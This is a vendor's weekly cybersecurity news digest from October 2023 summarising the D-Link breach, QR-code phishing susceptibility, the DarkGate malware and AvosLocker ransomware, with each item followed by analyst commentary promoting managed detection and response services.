This Week in Cyber 20th October 2023

Cybersecurity Breach at D-Link: Lessons on Data Exposure and the Role of MDR Services

Overview

D-Link, the Taiwanese networking equipment manufacturer, has confirmed a data breach that exposed what it termed "low-sensitivity and semi-public information." The company clarified that this data, originating from an old D-View 6 system, used for registration purposes in the past, was not from the cloud and did not contain user IDs or financial information. This breach was brought to light when an unauthorised party claimed to have stolen data of government officials in Taiwan and D-Link's D-View network management software source code.

D-Link engaged cybersecurity firm Trend Micro to investigate the incident and found that only around 700 "outdated and fragmented" records were compromised, contradicting initial claims of millions of users' data being stolen. The company believes that the breach occurred due to an employee falling victim to a phishing attack and is taking measures to enhance its security practices. It's important to note that D-Link has stated that its current active customers are unlikely to be affected by this breach.

Analyst Insight

In the context of early threat detection, a Managed Detection and Response (MDR) service could have been instrumental in identifying and responding to this threat in its initial stages. MDR services specialise in continuously monitoring and analysing network activity, identifying unusual patterns, and detecting security incidents promptly. By doing so, they can help organisations recognise and respond to potential breaches and attacks, including phishing incidents, much earlier in the process, thus reducing the impact and potential data exposure.

Alarming Trends in Employee Phishing Susceptibility: QR Codes and the Need for Ongoing Training

Overview

A study known as the Hoxhunt Challenge has highlighted concerning trends in employees' vulnerability to phishing attacks, particularly focusing on the use of QR codes. The research, conducted across various industries and regions, found that 22% of phishing attacks in October 2023 utilised QR codes to deliver malicious content. The study categorised employee responses into success, miss, and click/scan, revealing that only 36% of recipients were able to identify and report simulated attacks, leaving many organisations exposed to phishing threats. The retail sector had the highest miss rate, while legal and business services were better at recognising and reporting suspicious QR codes.

Analyst Insight

The study underscores the need for continuous cybersecurity training, including initial onboarding and regular refresher courses, as a crucial defence against phishing attacks and the risks associated with QR codes.

DarkGate: A Persistent Threat

Overview

DarkGate, a sophisticated malware variant, has reemerged, infiltrating organisations worldwide via compromised Skype and Microsoft Teams accounts. Since August, it has displayed heightened agility, targeting global entities, with a notable 41% focus on the Americas.

DarkGate's complexity is evident in its diverse capabilities, spanning system reconnaissance, cryptocurrency mining, keylogging, and privilege escalation. Telesoft's expert Security Operations Center (SOC) team excels in real-time communication channel monitoring. This capability enables swift anomaly detection in file attachments and meticulous scrutiny of external interactions, providing early alerts against DarkGate's deceptive methods.

Analyst Insight

Utilising tools like AutoIT, DarkGate effectively conceals its activities, posing a challenge to conventional detection methods. Upon infiltration, DarkGate deploys diverse payloads, including its iterations and Remcos, a well-known remote access Trojan, heightening potential damages. Telesoft's MDR service leverages advanced threat intelligence, recognising subtle patterns to identify DarkGate's distinct behaviours. 

Preventing Ransomware Deployment: How 24/7 MDR Services Stay Ahead of Emerging Threats

Overview

Ransomware attacks, particularly the AvosLocker gang, have been targeting critical infrastructure sectors in the United States, with some incidents detected as recently as May 2023. AvosLocker affiliates compromise networks using legitimate software and open-source tools, and they employ data extortion tactics, threatening to leak or publish stolen data. The ransomware strain, active since mid-2021, has sophisticated techniques to disable antivirus protection and affects Windows, Linux, and VMware ESXi environments.

Key characteristics of AvosLocker attacks include using open-source tools and "living-off-the-land" tactics, which leave minimal traces for attribution. Various legitimate utilities are used for data exfiltration, tunneling, and command-and-control. Additionally, custom scripts and tools are employed for lateral movement and privilege escalation. The agencies recommend security measures for critical infrastructure organisations to reduce the likelihood and impact of ransomware attacks.

In 2023, ransomware attacks have surged, and threat actors are deploying ransomware quickly, often within one day of initial access. Common initial access vectors for ransomware attacks include public-facing applications, stolen credentials, off-the-shelf malware, and external remote services. The rise of ransomware-as-a-service (RaaS) and the availability of ransomware code have made it easier for criminals to engage in ransomware attacks. Smaller organisations are increasingly targeted, and human-operated ransomware attacks have increased substantially.

Analyst Insight

Telesoft's 24/7 MDR service is well-equipped to detect ransomware threats, like AvosLocker, in their early stages. By providing real-time monitoring, threat intelligence, anomaly detection, and rapid incident response, MDR services help organisations mitigate these threats before they can deploy ransomware and cause significant damage.